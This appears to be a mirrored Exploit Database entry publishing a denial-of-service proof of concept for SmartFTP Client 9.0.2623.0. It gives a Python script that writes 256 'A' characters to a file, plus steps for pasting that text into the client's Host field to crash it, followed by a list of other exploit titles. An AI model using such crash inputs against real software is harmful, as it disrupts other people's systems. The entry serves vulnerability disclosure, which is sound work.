SmartFTP Client 9.0.2623.0 – Denial of Service (PoC)

Exploit Database
15 阅读

作者： Alejandra Sánchez

日期： 2018-12-11
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/45966/

# -*- coding: utf-8 -*-
# Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service (PoC)
# Date: 06/12/2018
# Exploit Author: Alejandra Sánchez
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/get/SFTPMSI64.exe
# Version: 9.0.2623.0
# Tested on: Windows Server 2016 (x64)/ Windows 10 Single Language x64

# Steps to Produce the Crash: 
# 1.- Run python code : python SmartFTPClient.py
# 2.- Open SmartFTPClient.txt and copy content to clipboard
# 3.- Open SmartFTP Client 
# 4.- New connection
# 5.- Paste ClipBoard on Host 
# 6.- Crashed


buffer = "\x41" * 256
f = open ("SmartFTPClient.txt", "w")
f.write(buffer)
f.close()

last Exploits
SmartFTP Client 9.0.2623.0 – Denial of Service (PoC)的更多信息

MagnetoSoft NetworkResources 4.0.0.5 – ActiveX NetShareEnum Overwrite (SEH) (PoC)：
WinMPG Video Convert 9.3.5 – Denial of Service：
PC Tools Firewall Plus 7.0.0.123 – Local Denial of Service：
Apple macOS – ‘getrusage’ Stack Leak Through struct Padding：
IrfanView JLS Formats PlugIn – Heap Overflow：
Fox Audio Player 0.8.0 – ‘.m3u’ Denial of Service：
FutureDj Pro 1.7.2.0 – Denial of Service：
Microsoft Office PowerPoint 2010 – ‘MSO!Ordinal5429’ Missing Length Check Heap Corruption：